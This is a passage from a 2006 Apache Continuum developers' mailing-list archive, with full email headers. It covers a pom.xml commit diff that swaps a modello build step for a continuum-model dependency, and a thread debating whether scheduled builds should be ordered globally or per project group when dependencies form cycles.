>>> > Date: Mon Nov 6 18:12:00 2006 >>> > New Revision: 471967 >>> > >>> > URL: http://svn.apache.org/viewvc?view=rev&rev=471967 >>> > Log: >>> > Don't rebuild model and depend on binary >>> > >>> > Modified: >>> > maven/continuum/trunk/continuum-rpc-client/pom.xml >>> > >>> > Modified: maven/continuum/trunk/continuum-rpc-client/pom.xml >>> > URL: >>> http://svn.apache.org/viewvc/maven/continuum/trunk/continuum-rpc-client/pom.xml?view=diff&rev=471967&r1=471966&r2=471967 >>> >>> > >>> ============================================================================== >>> >>> > --- maven/continuum/trunk/continuum-rpc-client/pom.xml (original) >>> > +++ maven/continuum/trunk/continuum-rpc-client/pom.xml Mon Nov 6 >>> 18:12:00 2006 >>> > @@ -14,22 +14,6 @@ >>> > <build> >>> > <plugins> >>> > <plugin> >>> > - <groupId>org.codehaus.modello</groupId> >>> > - <artifactId>modello-maven-plugin</artifactId> >>> > - <executions> >>> > - <execution> >>> > - <goals> >>> > - <goal>java</goal> >>> > - </goals> >>> > - </execution> >>> > - </executions> >>> > - <configuration> >>> > - <version>1.0.0</version> >>> > - <packageWithVersion>false</packageWithVersion> >>> > - >>> <model>../continuum-model/src/main/mdo/continuum.xml</model> >>> > - </configuration> >>> > - </plugin> >>> > - <plugin> >>> > <groupId>org.codehaus.mojo</groupId> >>> > <artifactId>exec-maven-plugin</artifactId> >>> > <configuration> >>> > @@ -42,6 +26,11 @@ >>> > </plugins> >>> > </build> >>> > <dependencies> >>> > + <dependency> >>> > + <groupId>org.apache.maven.continuum</groupId> >>> > + <artifactId>continuum-model</artifactId> >>> > + <version>${project.version}</version> >>> > + </dependency> >>> > <dependency> >>> > <groupId>xmlrpc</groupId> >>> > <artifactId>xmlrpc</artifactId> >>> > >>> > >>> > >>> > >>> > >>> >>> >> >> > > > From [email protected] Tue Nov 07 22:11:43 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 69863 invoked from network); 7 Nov 2006 22:11:43 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 7 Nov 2006 22:11:43 -0000 Received: (qmail 44434 invoked by uid 500); 7 Nov 2006 22:11:52 -0000 Delivered-To: [email protected] Received: (qmail 44409 invoked by uid 500); 7 Nov 2006 22:11:52 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <continuum-dev.maven.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 44397 invoked by uid 99); 7 Nov 2006 22:11:52 -0000 Received: from herse.apache.org (HELO herse.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 07 Nov 2006 14:11:52 -0800 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (herse.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO ug-out-1314.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 07 Nov 2006 14:11:38 -0800 Received: by ug-out-1314.google.com with SMTP id j40so1189289ugd for <[email protected]>; Tue, 07 Nov 2006 14:11:16 -0800 (PST) DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws; s=beta; d=gmail.com; h=received:message-id:date:from:sender:to:subject:in-reply-to:mime-version:content-type:content-transfer-encoding:content-disposition:references:x-google-sender-auth; b=TQx2c04yaxFf49zlM8JcwVAjy+AcM1cmx/QXOi6D7OlTavLZwI+ifpIsoEx+R1AWO2BxkP2iiOnMH28ebirk4lgOHRoRWXOG6dcuUXZSefa5XqXCK53V1CuEtTiNE5f6EnV9UqZ+AxwOklz9nzqX7stmFPnwKByXQ4ZaDMRQgDE= Received: by 161.129.204.104 with SMTP id b5mr1599906bud.1162937476011; Tue, 07 Nov 2006 14:11:16 -0800 (PST) Received: by 161.129.204.104 with HTTP; Tue, 7 Nov 2006 14:11:10 -0800 (PST) Message-ID: <[email protected]> Date: Tue, 7 Nov 2006 14:11:10 -0800 From: "Carlos Sanchez" <[email protected]> Sender: [email protected] To: [email protected] Subject: Re: svn commit: r471967 - /maven/continuum/trunk/continuum-rpc-client/pom.xml In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: quoted-printable Content-Disposition: inline References: <[email protected]> <[email protected]> <[email protected]> <[email protected]> X-Google-Sender-Auth: ccae2b18b8ce90b6 X-Virus-Checked: Checked by ClamAV on apache.org it's gonna be tricky because continuum-jpox would include the classes of continuum-model, so it has to exclude that dependency. On 11/7/06, Emmanuel Venisse <[email protected]> wrote: > I'm agree, but I'm not sure it will be used elsewhere that rpc-client > > Carlos Sanchez a =E9crit : > > ok, then we'll probably need continuum-model and continuum-model-jpox, > > agree ? > > > > On 11/7/06, Emmanuel Venisse <[email protected]> wrote: > >> Carlos, > >> > >> I'm not sure it's correct. If you use continuum-model, you use java > >> classes enhanced by jpox > >> > >> Emmanuel > >> > >> [email protected] a =E9crit : > >> > Author: carlos > >> > Date: Mon Nov 6 18:12:00 2006 > >> > New Revision: 471967 > >> > > >> > URL: http://svn.apache.org/viewvc?view=3Drev&rev=3D471967 > >> > Log: > >> > Don't rebuild model and depend on binary > >> > > >> > Modified: > >> > maven/continuum/trunk/continuum-rpc-client/pom.xml > >> > > >> > Modified: maven/continuum/trunk/continuum-rpc-client/pom.xml > >> > URL: > >> http://svn.apache.org/viewvc/maven/continuum/trunk/continuum-rpc-clien= t/pom.xml?view=3Ddiff&rev=3D471967&r1=3D471966&r2=3D471967 > >> > >> > > >> =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D > >> > >> > --- maven/continuum/trunk/continuum-rpc-client/pom.xml (original) > >> > +++ maven/continuum/trunk/continuum-rpc-client/pom.xml Mon Nov 6 > >> 18:12:00 2006 > >> > @@ -14,22 +14,6 @@ > >> > <build> > >> > <plugins> > >> > <plugin> > >> > - <groupId>org.codehaus.modello</groupId> > >> > - <artifactId>modello-maven-plugin</artifactId> > >> > - <executions> > >> > - <execution> > >> > - <goals> > >> > - <goal>java</goal> > >> > - </goals> > >> > - </execution> > >> > - </executions> > >> > - <configuration> > >> > - <version>1.0.0</version> > >> > - <packageWithVersion>false</packageWithVersion> > >> > - <model>../continuum-model/src/main/mdo/continuum.xml</mod= el> > >> > - </configuration> > >> > - </plugin> > >> > - <plugin> > >> > <groupId>org.codehaus.mojo</groupId> > >> > <artifactId>exec-maven-plugin</artifactId> > >> > <configuration> > >> > @@ -42,6 +26,11 @@ > >> > </plugins> > >> > </build> > >> > <dependencies> > >> > + <dependency> > >> > + <groupId>org.apache.maven.continuum</groupId> > >> > + <artifactId>continuum-model</artifactId> > >> > + <version>${project.version}</version> > >> > + </dependency> > >> > <dependency> > >> > <groupId>xmlrpc</groupId> > >> > <artifactId>xmlrpc</artifactId> > >> > > >> > > >> > > >> > > >> > > >> > >> > > > > > > --=20 I could give you my word as a Spaniard. No good. I've known too many Spaniards. -- The Princess Bride From [email protected] Tue Nov 07 22:52:23 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 82483 invoked from network); 7 Nov 2006 22:52:22 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 7 Nov 2006 22:52:22 -0000 Received: (qmail 21767 invoked by uid 500); 7 Nov 2006 22:52:33 -0000 Delivered-To: [email protected] Received: (qmail 21629 invoked by uid 500); 7 Nov 2006 22:52:32 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <continuum-dev.maven.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 21618 invoked by uid 99); 7 Nov 2006 22:52:32 -0000 Received: from herse.apache.org (HELO herse.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 07 Nov 2006 14:52:32 -0800 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (herse.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO nf-out-0910.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 07 Nov 2006 14:52:19 -0800 Received: by nf-out-0910.google.com with SMTP id l24so280848nfc for <[email protected]>; Tue, 07 Nov 2006 14:51:58 -0800 (PST) DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws; s=beta; d=gmail.com; h=received:message-id:date:from:to:subject:mime-version:content-type:content-transfer-encoding:content-disposition; b=X6kRPpqhWAMwCMCWi2vMUYKgTI7IUXAhkv3pbM7LU8uyF9LcrtrpWZOfoE3YFiftS0zd3cN93IgxFWDnTgzdpjgQCoHS9UKkSqxQ8lbaouh7DOBaosEj9zAKsBoLDfXxdcc3jdh6SPXwOfjKDrM1qNMkQ9ItkIuoJWC8Os6GgoA= Received: by 161.129.204.104 with SMTP id z16mr1028002bud.1162939917789; Tue, 07 Nov 2006 14:51:57 -0800 (PST) Received: by 161.129.204.104 with HTTP; Tue, 7 Nov 2006 14:51:57 -0800 (PST) Message-ID: <[email protected]> Date: Tue, 7 Nov 2006 16:51:57 -0600 From: "Jesse McConnell" <[email protected]> To: [email protected] Subject: build scheduling issues MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8; format=flowed Content-Transfer-Encoding: 7bit Content-Disposition: inline X-Virus-Checked: Checked by ClamAV on apache.org I was reading through the DefaultContinuum.buildProjects( Schedule id ) method and after discussing some things with Emmanuel...I think we have a problem here. When I went through and refactored things to support a more Project Group centric setup with continuum I changed this method a bit. Originally, this method would gather up all projects that would be triggered by that schedule, run them all through the project sorter and then build each in sequence. When I added the project groups to this mix, I changed things to be on a project group basis, so that on a project group by project group basis it would order the projects and build them. At the time I thought this was the way to go...but maybe not. 17:14 <evenisse> we need to take all projects from all groups, sort them 17:15 <evenisse> if we don't have a cycle, it's ok and we build all 17:15 <evenisse> if it isn't ok, we sort project by group For example, if we loaded up a Plexus group and a Maven group...the way it currently is (with my change) it would process all triggered builds within one group and then process all triggered builds in the other group. This would not take into account potential dependencies between the two. Does anyone have any thoughts on this? I am inclined to fix it up so its like it used to be where all projects across all project groups are thrown into the graph....I keep feeling like I am missing something wrong with this, but I can't pin it down. One thing that perhaps Emmanuel could explain a bit more is the third comment there. In our conversation on this he said that he thinks that the cycles are cropping up all the time, and if thats the case then we are building a lot of unordered builds which would account for some of the strange reports we have been getting. Are you saying that if we detect the cycle we default back to the way I am doing it now? order within the groups... jesse -- jesse mcconnell [email protected] From [email protected] Tue Nov 07 23:56:23 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 97628 invoked from network); 7 Nov 2006 23:56:13 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 7 Nov 2006 23:56:13 -0000 Received: (qmail 7498 invoked by uid 500); 7 Nov 2006 23:56:24 -0000 Delivered-To: [email protected] Received: (qmail 7479 invoked by uid 500); 7 Nov 2006 23:56:24 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <continuum-dev.maven.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 7468 invoked by uid 99); 7 Nov 2006 23:56:24 -0000 Received: from herse.apache.org (HELO herse.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 07 Nov 2006 15:56:24 -0800 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received-SPF: neutral (herse.apache.org: local policy) Received: from [161.129.204.104] (HELO customer-domains.icp-qv1-irony14.iinet.net.au) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 07 Nov 2006 15:56:10 -0800 Received: from 203-158-38-82.dyn.iinet.net.au (HELO [161.129.204.104]) ([161.129.204.104]) by iinet-mail.icp-qv1-irony14.iinet.net.au with ESMTP; 08 Nov 2006 07:55:42 +0800 X-IronPort-Anti-Spam-Filtered: true X-IronPort-Anti-Spam-Result: AgAAAGOrUEXLniZSfmdsb2JhbAANjD0BAQ X-IronPort-AV: i="4.09,398,1157299200"; d="scan'208"; a="13766243:sNHT2188655442" Mime-Version: 1.0 (Apple Message framework v752.3) In-Reply-To: <[email protected]> References: <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> Content-Type: text/plain; charset=ISO-8859-1; delsp=yes; format=flowed Message-Id: <[email protected]> Content-Transfer-Encoding: quoted-printable From: Brett Porter <[email protected]> Subject: Re: svn commit: r471967 - /maven/continuum/trunk/continuum-rpc-client/pom.xml Date: Wed, 8 Nov 2006 10:55:39 +1100 To: [email protected] X-Mailer: Apple Mail (2.752.3) X-Virus-Checked: Checked by ClamAV on apache.org Why doesn't continuum-model produce the unenhanced JAR, and attach an =20= enhanced JAR as a second artifact with a classifier? - Brett On 08/11/2006, at 9:11 AM, Carlos Sanchez wrote: > it's gonna be tricky because continuum-jpox would include the classes > of continuum-model, so it has to exclude that dependency. > > On 11/7/06, Emmanuel Venisse <[email protected]> wrote: >> I'm agree, but I'm not sure it will be used elsewhere that rpc-client >> >> Carlos Sanchez a =E9crit : >> > ok, then we'll probably need continuum-model and continuum-model-=20= >> jpox, >> > agree ? >> > >> > On 11/7/06, Emmanuel Venisse <[email protected]> wrote: >> >> Carlos, >> >> >> >> I'm not sure it's correct. If you use continuum-model, you use =20 >> java >> >> classes enhanced by jpox >> >> >> >> Emmanuel >> >> >> >> [email protected] a =E9crit : >> >> > Author: carlos >> >> > Date: Mon Nov 6 18:12:00 2006 >> >> > New Revision: 471967 >> >> > >> >> > URL: http://svn.apache.org/viewvc?view=3Drev&rev=3D471967 >> >> > Log: >> >> > Don't rebuild model and depend on binary >> >> > >> >> > Modified: >> >> > maven/continuum/trunk/continuum-rpc-client/pom.xml >> >> > >> >> > Modified: maven/continuum/trunk/continuum-rpc-client/pom.xml >> >> > URL: >> >> http://svn.apache.org/viewvc/maven/continuum/trunk/continuum-=20 >> rpc-client/pom.xml?view=3Ddiff&rev=3D471967&r1=3D471966&r2=3D471967 >> >> >> >> > >> >> =20 >> =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=20 >> =3D=3D=3D=3D=3D=3D=3D=3D=3D >> >> >> >> > --- maven/continuum/trunk/continuum-rpc-client/pom.xml =20 >> (original) >> >> > +++ maven/continuum/trunk/continuum-rpc-client/pom.xml Mon =20 >> Nov 6 >> >> 18:12:00 2006 >> >> > @@ -14,22 +14,6 @@ >> >> > <build> >> >> > <plugins> >> >> > <plugin> >> >> > - <groupId>org.codehaus.modello</groupId> >> >> > - <artifactId>modello-maven-plugin</artifactId> >> >> > - <executions> >> >> > - <execution> >> >> > - <goals> >> >> > - <goal>java</goal> >> >> > - </goals> >> >> > - </execution> >> >> > - </executions> >> >> > - <configuration> >> >> > - <version>1.0.0</version> >> >> > - <packageWithVersion>false</packageWithVersion> >> >> > - <model>../continuum-model/src/main/mdo/=20 >> continuum.xml</model> >> >> > - </configuration> >> >> > - </plugin> >> >> > - <plugin> >> >> > <groupId>org.codehaus.mojo</groupId> >> >> > <artifactId>exec-maven-plugin</artifactId> >> >> > <configuration> >> >> > @@ -42,6 +26,11 @@ >> >> > </plugins> >> >> > </build> >> >> > <dependencies> >> >> > + <dependency> >> >> > + <groupId>org.apache.maven.continuum</groupId> >> >> > + <artifactId>continuum-model</artifactId> >> >> > + <version>${project.version}</version> >> >> > + </dependency> >> >> > <dependency> >> >> > <groupId>xmlrpc</groupId> >> >> > <artifactId>xmlrpc</artifactId> >> >> > >> >> > >> >> > >> >> > >> >> > >> >> >> >> >> > >> > >> >> > > > --=20 > I could give you my word as a Spaniard. > No good. I've known too many Spaniards. > -- The Princess Bride From [email protected] Wed Nov 08 00:35:26 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 14223 invoked from network); 8 Nov 2006 00:35:26 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 8 Nov 2006 00:35:26 -0000 Received: (qmail 2665 invoked by uid 500); 8 Nov 2006 00:35:37 -0000 Delivered-To: [email protected] Received: (qmail 2639 invoked by uid 500); 8 Nov 2006 00:35:37 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <continuum-dev.maven.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 2628 invoked by uid 99); 8 Nov 2006 00:35:37 -0000 Received: from herse.apache.org (HELO herse.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 07 Nov 2006 16:35:37 -0800 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (herse.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO nf-out-0910.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 07 Nov 2006 16:35:23 -0800 Received: by nf-out-0910.google.com with SMTP id l24so302172nfc for <[email protected]>; Tue, 07 Nov 2006 16:35:01 -0800 (PST) DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws; s=beta; d=gmail.com; h=received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:content-transfer-encoding:content-disposition:references; b=g3gj4QGsvhyibcK87aq72BIgChGyih95/C+ez1pReIqJXZYdKuobeBNFjCM6646MGtDPp2e9KcaHCUmcNLHOHfHgxgVpIRAa/hMIwy0GLBHN0dk1Rjh6maTlFCv74h1lJM4nYAzogfhMvgKfwbyi8ielc+Ii99KU6wJOa3XS89I= Received: by 161.129.204.104 with SMTP id v13mr1628920bub.1162946101532; Tue, 07 Nov 2006 16:35:01 -0800 (PST) Received: by 161.129.204.104 with HTTP; Tue, 7 Nov 2006 16:35:01 -0800 (PST) Message-ID: <[email protected]> Date: Wed, 8 Nov 2006 11:05:01 +1030 From: "Barrie Treloar" <[email protected]> To: [email protected] Subject: Re: build scheduling issues In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit Content-Disposition: inline References: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org > One thing that perhaps Emmanuel could explain a bit more is the third > comment there. In our conversation on this he said that he thinks > that the cycles are cropping up all the time, and if thats the case > then we are building a lot of unordered builds which would account for > some of the strange reports we have been getting. Are you saying that > if we detect the cycle we default back to the way I am doing it now? > order within the groups... Isn't a cycle a bad thing? If A -> B and B -> A and if neither have been built yet this goes boom. From [email protected] Wed Nov 08 01:54:25 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 32477 invoked from network); 8 Nov 2006 01:54:24 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 8 Nov 2006 01:54:24 -0000 Received: (qmail 90594 invoked by uid 500); 8 Nov 2006 01:54:35 -0000 Delivered-To: [email protected] Received: (qmail 90572 invoked by uid 500); 8 Nov 2006 01:54:35 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <continuum-dev.maven.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 90561 invoked by uid 99); 8 Nov 2006 01:54:35 -0000 Received: from herse.apache.org (HELO herse.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 07 Nov 2006 17:54:35 -0800 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received-SPF: neutral (herse.apache.org: local policy) Received: from [161.129.204.104] (HELO customer-domains.icp-qv1-irony10.iinet.net.au) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 07 Nov 2006 17:54:19 -0800 Received: from 203-158-38-82.dyn.iinet.net.au (HELO [161.129.204.104]) ([161.129.204.104]) by customer-domains.icp-qv1-irony10.iinet.net.au with ESMTP; 08 Nov 2006 09:53:38 +0800 X-IronPort-Anti-Spam-Filtered: true X-IronPort-Anti-Spam-Result: AgAAAJnHUEXLniZSdGdsb2JhbAANjD0B X-IronPort-AV: i="4.09,398,1157299200"; d="scan'208"; a="23948754:sNHT5568809346" Mime-Version: 1.0 (Apple Message framework v752.3) In-Reply-To: <[email protected]> References: <[email protected]> Content-Type: text/plain; charset=US-ASCII; delsp=yes; format=flowed Message-Id: <[email protected]> Content-Transfer-Encoding: 7bit From: Brett Porter <[email protected]> Subject: Re: build scheduling issues Date: Wed, 8 Nov 2006 12:53:35 +1100 To: [email protected] X-Mailer: Apple Mail (2.752.3) X-Virus-Checked: Checked by ClamAV on apache.org I think you want global ordering. Grouping should just be a display/ management technique, not anything that changes how projects are handled. However, this needs to be reviewed as a whole (which I think Emmanuel is doing), such that builds can be triggered when their dependencies change which will help with the ordering as it won't be dependant on them all being triggered at the same time? - Brett On 08/11/2006, at 9:51 AM, Jesse McConnell wrote: > I was reading through the DefaultContinuum.buildProjects( Schedule id > ) method and after discussing some things with Emmanuel...I think we > have a problem here. When I went through and refactored things to > support a more Project Group centric setup with continuum I changed > this method a bit. > > Originally, this method would gather up all projects that would be > triggered by that schedule, run them all through the project sorter > and then build each in sequence. > > When I added the project groups to this mix, I changed things to be on > a project group basis, so that on a project group by project group > basis it would order the projects and build them. At the time I > thought this was the way to go...but maybe not. > > 17:14 <evenisse> we need to take all projects from all groups, sort > them > 17:15 <evenisse> if we don't have a cycle, it's ok and we build all > 17:15 <evenisse> if it isn't ok, we sort project by group > > For example, if we loaded up a Plexus group and a Maven group...the > way it currently is (with my change) it would process all triggered > builds within one group and then process all triggered builds in the > other group. This would not take into account potential dependencies > between the two. > > Does anyone have any thoughts on this? I am inclined to fix it up so > its like it used to be where all projects across all project groups > are thrown into the graph....I keep feeling like I am missing > something wrong with this, but I can't pin it down. > > One thing that perhaps Emmanuel could explain a bit more is the third > comment there. In our conversation on this he said that he thinks > that the cycles are cropping up all the time, and if thats the case > then we are building a lot of unordered builds which would account for > some of the strange reports we have been getting. Are you saying that > if we detect the cycle we default back to the way I am doing it now? > order within the groups... > > jesse > > > > > > -- > jesse mcconnell > [email protected] From [email protected] Wed Nov 08 02:43:38 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 48724 invoked from network); 8 Nov 2006 02:43:38 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 8 Nov 2006 02:43:38 -0000 Received: (qmail 66072 invoked by uid 500); 8 Nov 2006 02:43:47 -0000 Delivered-To: [email protected] Received: (qmail 66000 invoked by uid 500); 8 Nov 2006 02:43:47 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <continuum-dev.maven.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 65989 invoked by uid 99); 8 Nov 2006 02:43:47 -0000 Received: from herse.apache.org (HELO herse.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 07 Nov 2006 18:43:47 -0800 X-ASF-Spam-Status: No, hits=1.4 required=10.0 tests=SPF_NEUTRAL X-Spam-Check-By: apache.org Received-SPF: neutral (herse.apache.org: 161.129.204.104 is neither permitted nor denied by domain of [email protected]) Received: from [161.129.204.104] (HELO geronimo.freeparking.co.nz) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 07 Nov 2006 18:43:25 -0800 Received: from [161.129.204.104] (222-155-212-88.jetstream.xtra.co.nz [161.129.204.104]) (authenticated) by geronimo.freeparking.co.nz (8.10.2/8.10.2) with ESMTP id kA82h0s15535 for <[email protected]>; Wed, 8 Nov 2006 15:43:00 +1300 Message-ID: <[email protected]> Date: Wed, 08 Nov 2006 15:42:57 +1300 From: Rahul Thakur <[email protected]> User-Agent: Thunderbird 161.129.204.104 (Windows/20060909) MIME-Version: 1.0 To: [email protected] Subject: Re: build scheduling issues References: <[email protected]> In-Reply-To: <[email protected]> Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org How about extending the notion of Schedule and allow the user to re-order builds in a schedule? In absence of any order, default to the order the Projects/ProjectGroups were added to the schedule. Rahul Jesse McConnell wrote: > I was reading through the DefaultContinuum.buildProjects( Schedule id > ) method and after discussing some things with Emmanuel...I think we > have a problem here. When I went through and refactored things to > support a more Project Group centric setup with continuum I changed > this method a bit. > > Originally, this method would gather up all projects that would be > triggered by that schedule, run them all through the project sorter > and then build each in sequence. > > When I added the project groups to this mix, I changed things to be on > a project group basis, so that on a project group by project group > basis it would order the projects and build them. At the time I > thought this was the way to go...but maybe not. > > 17:14 <evenisse> we need to take all projects from all groups, sort them > 17:15 <evenisse> if we don't have a cycle, it's ok and we build all > 17:15 <evenisse> if it isn't ok, we sort project by group > > For example, if we loaded up a Plexus group and a Maven group...the > way it currently is (with my change) it would process all triggered > builds within one group and then process all triggered builds in the > other group. This would not take into account potential dependencies > between the two. > > Does anyone have any thoughts on this? I am inclined to fix it up so > its like it used to be where all projects across all project groups > are thrown into the graph....I keep feeling like I am missing > something wrong with this, but I can't pin it down. > > One thing that perhaps Emmanuel could explain a bit more is the third > comment there. In our conversation on this he said that he thinks > that the cycles are cropping up all the time, and if thats the case > then we are building a lot of unordered builds which would account for > some of the strange reports we have been getting. Are you saying that > if we detect the cycle we default back to the way I am doing it now? > order within the groups... > > jesse > > > > > From [email protected] Wed Nov 08 02:47:31 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 49220 invoked from network); 8 Nov 2006 02:47:31 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 8 Nov 2006 02:47:31 -0000 Received: (qmail 70244 invoked by uid 500); 8 Nov 2006 02:47:41 -0000 Delivered-To: [email protected] Received: (qmail 70218 invoked by uid 500); 8 Nov 2006 02:47:41 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <continuum-dev.maven.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 70197 invoked by uid 99); 8 Nov 2006 02:47:41 -0000 Received: from herse.apache.org (HELO herse.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 07 Nov 2006 18:47:41 -0800 X-ASF-Spam-Status: No, hits=1.4 required=10.0 tests=SPF_NEUTRAL X-Spam-Check-By: apache.org Received-SPF: neutral (herse.apache.org: 161.129.204.104 is neither permitted nor denied by domain of [email protected]) Received: from [161.129.204.104] (HELO geronimo.freeparking.co.nz) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 07 Nov 2006 18:47:23 -0800 Received: from [161.129.204.104] (222-155-212-88.jetstream.xtra.co.nz [161.129.204.104]) (authenticated) by geronimo.freeparking.co.nz (8.10.2/8.10.2) with ESMTP id kA82jxs16214 for <[email protected]>; Wed, 8 Nov 2006 15:45:59 +1300 Message-ID: <[email protected]> Date: Wed, 08 Nov 2006 15:45:58 +1300 From: Rahul Thakur <[email protected]> User-Agent: Thunderbird 161.129.204.104 (Windows/20060909) MIME-Version: 1.0 To: [email protected] Subject: Re: build scheduling issues References: <[email protected]> <[email protected]> In-Reply-To: <[email protected]> Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org I meant extending the notion that every Project or ProjectGroup added to a Schedule also has an order attached to it which may be user assigned or default. Rahul Thakur wrote: > > How about extending the notion of Schedule and allow the user to > re-order builds in a schedule? In absence of any order, default to the > order the Projects/ProjectGroups were added to the schedule. > > Rahul > > > Jesse McConnell wrote: >> I was reading through the DefaultContinuum.buildProjects( Schedule id >> ) method and after discussing some things with Emmanuel...I think we >> have a problem here. When I went through and refactored things to >> support a more Project Group centric setup with continuum I changed >> this method a bit. >> >> Originally, this method would gather up all projects that would be >> triggered by that schedule, run them all through the project sorter >> and then build each in sequence. >> >> When I added the project groups to this mix, I changed things to be on >> a project group basis, so that on a project group by project group >> basis it would order the projects and build them. At the time I >> thought this was the way to go...but maybe not. >> >> 17:14 <evenisse> we need to 